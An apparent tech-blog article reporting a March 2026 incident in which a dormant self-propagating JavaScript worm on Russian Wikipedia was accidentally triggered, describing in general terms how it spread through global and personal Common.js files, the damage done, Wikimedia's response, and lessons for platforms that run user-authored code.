Light bulb Limited Spots Available: Secure Your Lifetime Subscription on Gumroad!

Mar 08, 2026 · 5 min read

A Malicious Script Sat in Wikipedia for Two Years—Then a Security Engineer Accidentally Triggered It

A self propagating JavaScript worm vandalized nearly 4,000 Wikipedia pages, compromised 85 user accounts, and forced the world’s largest encyclopedia into read only mode.

Close up of a computer screen displaying JavaScript code with a red warning overlay in a dimly lit workspace

The 23 Minute Takeover

On March 5, 2026, Wikimedia Foundation staff were running a routine security review of user authored code across Wikimedia projects. During the review, a security engineer inadvertently executed a dormant malicious script that had been uploaded to Russian Wikipedia in March 2024. The code had sat undetected for approximately two years.

Once activated, the worm took just 23 minutes to vandalize 3,996 pages, replace the personal JavaScript files of 85 users, and force the Wikimedia Foundation to put all projects into read only mode.

The malicious script was stored at User:Ololoshka562/test.js and had been associated with scripts used in previous attacks on wiki projects. Its two year dormancy period highlights a fundamental challenge in open platforms: code that looks harmless today can become a weapon the moment the right conditions align.

How the Worm Spread

The worm exploited Wikipedia's user script system with a dual layer propagation strategy. When the compromised staff account, which had elevated permissions to edit global JavaScript, triggered the code, the worm injected itself into MediaWiki:Common.js, a global script that runs on every page across all Wikimedia wikis.

As a fallback mechanism, the worm simultaneously injected itself into individual users' User:Common.js files. This meant that even if the global script was cleaned up, any user who loaded an infected personal script would restart the propagation cycle.

The worm also used the Special:Random command to select pages at random, inserting oversized images and hidden JavaScript loaders into each one. If the infected user had administrative privileges, the script escalated its behavior: deleting pages using Special:Nuke and action=delete functions.

The Damage

In under half an hour, the worm accomplished the following:

  • Vandalized 3,996 pages with oversized images and injected scripts
  • Replaced 85 users' personal common.js files with the malicious loader
  • Deleted multiple articles using administrative privileges
  • Injected cross site scripting payloads referencing an external domain

Editors first reported the incident on Wikipedia's Village Pump technical forum, where users noticed a flood of automated edits adding hidden scripts and vandalism to random pages.

Wikimedia's Response

The Wikimedia Foundation moved quickly once the incident was identified. All projects were placed in read only mode for approximately two hours to stop the worm from spreading further. User JavaScript was temporarily disabled across all wikis for most of the day.

Engineers reverted the global Common.js file, manually rolled back the 85 compromised user scripts, and restored all deleted and vandalized pages from backups. The modified pages were then "suppressed," removing them from public change histories to prevent the malicious code from being copied.

The Foundation confirmed that no personal information was breached and no permanent damage occurred. But the incident exposed a structural vulnerability that had existed for years.

The Larger Problem: Open Platforms and Trusted Code

Wikipedia allows users to write custom JavaScript that runs in their own browser sessions. Power users and administrators rely on these scripts for moderation, editing tools, and workflow automation. The system is built on trust: anyone can upload a script, and anyone with the right permissions can execute one.

This architecture mirrors the trust models used by browser extension marketplaces, package managers like npm, and plugin ecosystems across the software industry. In each case, a single piece of malicious code, once trusted, can propagate through the entire system.

The Wikipedia worm did not exploit a zero day vulnerability or bypass any authentication system. It simply waited until someone with elevated privileges ran it. That is the same attack pattern behind trojanized MCP servers, malicious VS Code extensions, and compromised browser extension updates. The code was there. It just needed the right moment.

What This Means for Security

The Wikipedia incident is a textbook example of a supply chain style attack on a platform that allows user contributed code. The key takeaways are straightforward:

  • Dormant malicious code can survive for years before being triggered
  • Elevated privileges amplify the damage of any compromised script
  • Platforms that allow user authored code need automated scanning, not just manual review
  • Self propagating code can spread faster than human response times

Wikipedia was lucky. The worm's payload was destructive but not catastrophic. It vandalized pages and deleted content, but it did not exfiltrate user data or plant persistent backdoors in the platform's infrastructure. A more sophisticated attacker, one willing to wait two years for the right trigger, could have done far worse.

The incident is a reminder that the most dangerous code is not always the newest. Sometimes it is the script that has been sitting quietly in a user directory since 2024, waiting for someone to run it.